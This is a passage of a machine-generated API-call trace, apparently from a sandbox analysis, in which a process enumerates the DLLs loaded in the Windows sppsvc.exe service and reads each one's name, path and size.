lpcbNeeded=0x23ee40 | out: lphModule=0x24d05d0, lpcbNeeded=0x23ee40) returned 1 [0073.877] GetModuleInformation (in: hProcess=0x214, hModule=0xff780000, lpmodinfo=0x24d0840, cb=0x18 | out: lpmodinfo=0x24d0840*(lpBaseOfDll=0xff780000, SizeOfImage=0x35f000, EntryPoint=0xff7cc21c)) returned 1 [0073.877] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.877] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xff780000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="sppsvc.exe") returned 0xa [0073.878] CoTaskMemFree (pv=0xd910e0) [0073.878] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.878] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xff780000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sppsvc.exe" (normalized: "c:\\windows\\system32\\sppsvc.exe")) returned 0x1e [0073.878] CoTaskMemFree (pv=0xd910e0) [0073.878] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24d2a38, cb=0x18 | out: lpmodinfo=0x24d2a38*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0073.878] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.878] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0073.879] CoTaskMemFree (pv=0xd910e0) [0073.879] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.879] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0073.879] CoTaskMemFree (pv=0xd910e0) [0073.880] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x24d4bf8, cb=0x18 | out: lpmodinfo=0x24d4bf8*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0073.880] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.880] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0073.881] CoTaskMemFree (pv=0xd910e0) [0073.881] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.881] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0073.881] CoTaskMemFree (pv=0xd910e0) [0073.881] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x24d6de0, cb=0x18 | out: lpmodinfo=0x24d6de0*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0073.882] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.882] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0073.882] CoTaskMemFree (pv=0xd910e0) [0073.882] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.882] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0073.883] CoTaskMemFree (pv=0xd910e0) [0073.883] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x24d8fb0, cb=0x18 | out: lpmodinfo=0x24d8fb0*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0073.883] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.883] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0073.884] CoTaskMemFree (pv=0xd910e0) [0073.884] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.884] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0073.885] CoTaskMemFree (pv=0xd910e0) [0073.885] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x24db1d8, cb=0x18 | out: lpmodinfo=0x24db1d8*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0073.885] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.885] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0073.886] CoTaskMemFree (pv=0xd910e0) [0073.886] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.886] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0073.887] CoTaskMemFree (pv=0xd910e0) [0073.887] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x24dd398, cb=0x18 | out: lpmodinfo=0x24dd398*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0073.887] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.887] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0073.888] CoTaskMemFree (pv=0xd910e0) [0073.888] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.888] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0073.889] CoTaskMemFree (pv=0xd910e0) [0073.889] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x24df558, cb=0x18 | out: lpmodinfo=0x24df558*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0073.889] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.889] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0073.890] CoTaskMemFree (pv=0xd910e0) [0073.890] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.890] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0073.891] CoTaskMemFree (pv=0xd910e0) [0073.891] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff760000, lpmodinfo=0x24e1718, cb=0x18 | out: lpmodinfo=0x24e1718*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0073.892] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.892] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0073.893] CoTaskMemFree (pv=0xd910e0) [0073.893] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.893] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0073.894] CoTaskMemFree (pv=0xd910e0) [0073.894] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff1c0000, lpmodinfo=0x24e3970, cb=0x18 | out: lpmodinfo=0x24e3970*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0073.894] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.894] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff1c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0073.895] CoTaskMemFree (pv=0xd910e0) [0073.895] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.895] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff1c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0073.896] CoTaskMemFree (pv=0xd910e0) [0073.896] GetModuleInformation (in: hProcess=0x214, hModule=0x77610000, lpmodinfo=0x24e5b30, cb=0x18 | out: lpmodinfo=0x24e5b30*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0073.897] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.897] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0073.898] CoTaskMemFree (pv=0xd910e0) [0073.898] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.898] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0073.899] CoTaskMemFree (pv=0xd910e0) [0073.899] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff350000, lpmodinfo=0x24e7cf0, cb=0x18 | out: lpmodinfo=0x24e7cf0*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0073.900] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.900] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff350000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0073.901] CoTaskMemFree (pv=0xd910e0) [0073.901] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.901] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff350000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0073.902] CoTaskMemFree (pv=0xd910e0) [0073.902] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff690000, lpmodinfo=0x24e9ea0, cb=0x18 | out: lpmodinfo=0x24e9ea0*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0073.903] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.903] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff690000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0073.904] CoTaskMemFree (pv=0xd910e0) [0073.904] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.904] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff690000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0073.905] CoTaskMemFree (pv=0xd910e0) [0073.905] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff400000, lpmodinfo=0x24ec060, cb=0x18 | out: lpmodinfo=0x24ec060*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0073.906] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.906] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff400000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0073.907] CoTaskMemFree (pv=0xd910e0) [0073.907] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.907] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff400000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0073.909] CoTaskMemFree (pv=0xd910e0) [0073.909] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9d0000, lpmodinfo=0x24ee220, cb=0x18 | out: lpmodinfo=0x24ee220*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0073.910] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.910] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0073.911] CoTaskMemFree (pv=0xd910e0) [0073.911] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.911] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0073.912] CoTaskMemFree (pv=0xd910e0) [0073.912] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd670000, lpmodinfo=0x24f03e0, cb=0x18 | out: lpmodinfo=0x24f03e0*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0073.913] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.913] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd670000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0073.914] CoTaskMemFree (pv=0xd910e0) [0073.914] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.914] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd670000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0073.916] CoTaskMemFree (pv=0xd910e0) [0073.916] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd760000, lpmodinfo=0x24f25b0, cb=0x18 | out: lpmodinfo=0x24f25b0*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0073.917] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.917] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0073.918] CoTaskMemFree (pv=0xd910e0) [0073.918] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.918] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0073.919] CoTaskMemFree (pv=0xd910e0) [0073.919] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd070000, lpmodinfo=0x24f4898, cb=0x18 | out: lpmodinfo=0x24f4898*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0073.921] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.921] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd070000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0073.922] CoTaskMemFree (pv=0xd910e0) [0073.922] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.922] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd070000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0073.923] CoTaskMemFree (pv=0xd910e0) [0073.923] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcd70000, lpmodinfo=0x24f6a58, cb=0x18 | out: lpmodinfo=0x24f6a58*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0073.925] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.925] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcd70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0073.926] CoTaskMemFree (pv=0xd910e0) [0073.926] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.926] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcd70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0073.927] CoTaskMemFree (pv=0xd910e0) [0073.927] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef31e0000, lpmodinfo=0x24f8c18, cb=0x18 | out: lpmodinfo=0x24f8c18*(lpBaseOfDll=0x7fef31e0000, SizeOfImage=0x6b000, EntryPoint=0x7fef3228b54)) returned 1 [0073.929] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.929] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef31e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="sppwinob.dll") returned 0xc [0073.930] CoTaskMemFree (pv=0xd910e0) [0073.930] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.930] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef31e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sppwinob.dll" (normalized: "c:\\windows\\system32\\sppwinob.dll")) returned 0x20 [0073.932] CoTaskMemFree (pv=0xd910e0) [0073.932] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef4d70000, lpmodinfo=0x24fae00, cb=0x18 | out: lpmodinfo=0x24fae00*(lpBaseOfDll=0x7fef4d70000, SizeOfImage=0x10d000, EntryPoint=0x7fef4dca848)) returned 1 [0073.933] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.933] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef4d70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="sppobjs.dll") returned 0xb [0073.934] CoTaskMemFree (pv=0xd910e0) [0073.934] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.934] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef4d70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sppobjs.dll" (normalized: "c:\\windows\\system32\\sppobjs.dll")) returned 0x1f [0073.936] CoTaskMemFree (pv=0xd910e0) [0073.936] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefce90000, lpmodinfo=0x24fcfc0, cb=0x18 | out: lpmodinfo=0x24fcfc0*(lpBaseOfDll=0x7fefce90000, SizeOfImage=0x5b000, EntryPoint=0x7fefce96940)) returned 1 [0073.937] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.937] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefce90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0073.939] CoTaskMemFree (pv=0xd910e0) [0073.939] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.939] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefce90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DNSAPI.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0073.940] CoTaskMemFree (pv=0xd910e0) [0073.940] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff970000, lpmodinfo=0x24ff180, cb=0x18 | out: lpmodinfo=0x24ff180*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0073.942] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.942] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff970000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0073.943] CoTaskMemFree (pv=0xd910e0) [0073.943] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.943] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff970000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0073.945] CoTaskMemFree (pv=0xd910e0) [0073.945] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9c0000, lpmodinfo=0x2501340, cb=0x18 | out: lpmodinfo=0x2501340*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0073.946] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.946] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0073.948] CoTaskMemFree (pv=0xd910e0) [0073.948] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.948] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0073.950] CoTaskMemFree (pv=0xd910e0) [0073.950] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdf90000, lpmodinfo=0x25034f0, cb=0x18 | out: lpmodinfo=0x25034f0*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0073.951] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.951] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdf90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0073.952] CoTaskMemFree (pv=0xd910e0) [0073.953] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.953] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdf90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0073.954] CoTaskMemFree (pv=0xd910e0) [0073.954] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff360000, lpmodinfo=0x25056c0, cb=0x18 | out: lpmodinfo=0x25056c0*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0073.956] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.956] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff360000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0073.957] CoTaskMemFree (pv=0xd910e0) [0073.957] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.957] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff360000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0073.959] CoTaskMemFree (pv=0xd910e0) [0073.959] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd640000, lpmodinfo=0x2507880, cb=0x18 | out: lpmodinfo=0x2507880*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0073.960] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.960] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd640000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0073.962] CoTaskMemFree (pv=0xd910e0) [0073.964] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.964] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd640000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0073.966] CoTaskMemFree (pv=0xd910e0) [0073.966] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdc80000, lpmodinfo=0x2509a40, cb=0x18 | out: lpmodinfo=0x2509a40*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0073.967] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0073.967] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdc80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0073.969] CoTaskMemFree (pv=0xd910e0) [0073.969] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdc80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0073.971] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd9a0000, lpmodinfo=0x250bc10, cb=0x18 | out: lpmodinfo=0x250bc10*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0073.972] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd9a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0073.974] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd9a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0073.976] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd980000, lpmodinfo=0x250dde0, cb=0x18 | out: lpmodinfo=0x250dde0*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0073.977] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd980000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0073.979] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd980000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0073.981] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd830000, lpmodinfo=0x250ffa0, cb=0x18 | out: lpmodinfo=0x250ffa0*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0073.983] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0073.985] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0073.986] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd9e0000, lpmodinfo=0x2512170, cb=0x18 | out: lpmodinfo=0x2512170*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0073.988] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0073.990] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0073.992] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd820000, lpmodinfo=0x2514330, cb=0x18 | out: lpmodinfo=0x2514330*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0073.996] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd820000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0073.998] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd820000, 